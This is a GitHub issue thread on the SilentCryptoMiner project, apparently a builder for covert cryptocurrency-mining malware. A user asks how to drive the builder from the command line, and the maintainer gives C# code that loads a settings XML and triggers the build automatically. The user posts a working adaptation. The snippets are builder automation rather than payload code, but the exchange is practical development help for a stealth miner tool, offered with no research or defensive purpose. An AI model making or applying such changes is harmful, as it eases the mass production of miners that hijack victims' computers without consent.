### ISSUE TITLE
console

### ISSUE THREAD

**Issue by anbu-squad** [UnamSanctam/SilentCryptoMiner#1696]
I wonder how to implement the console compilation of the miner?

For example:
-c settings file
-d path build

Builder.exe -c settings.xml -d C:/builder/build.exe  

I will try to make changes to the source code using AI

However, I want to get advice first

**Comment by UnamSanctam** [comment]
Using only console or is it alright if the GUI opens briefly? If it's alright that the GUI opens while it's building then it's quite easy. In this function where the main form gets loaded:
https://github.com/UnamSanctam/SilentCryptoMiner/blob/8caef3eec1040ddb982574ccd7cc3d88016f7c09/SilentCryptoMiner/Forms/Builder.cs#L50C11-L50C11

You can add this code at the end to load the settings file:
```
FormSerializer.Deserialise(new List<Control>() { this, FormAO }, loadpath);
ReloadMinerList();
InstallPathCheck();
TranslateForms();
```
WIth `loadpath` being the path to the .xml settings file (`-c`).

After that code you can then add the build code like this after that:
savePath = buildpath;
workerBuild.RunWorkerAsync();
With `buildpath` being the location to build the miner (`-d`)

**Comment by anbu-squad** [comment]
` string appDirectory = AppDomain.CurrentDomain.BaseDirectory;
            string settingsPath = Path.Combine(appDirectory, "settings.xml");
            FormSerializer.Deserialise(new List<Control>() { this, FormAO }, settingsPath);
            ReloadMinerList();
            InstallPathCheck();
            TranslateForms();
            string buildpath = Path.Combine(appDirectory, "build.exe");
            savePath = buildpath;
            workerBuild.RunWorkerAsync();`
            
            
            Thanks, I solved the task

**Comment by UnamSanctam** [comment]
Alright great, good job.
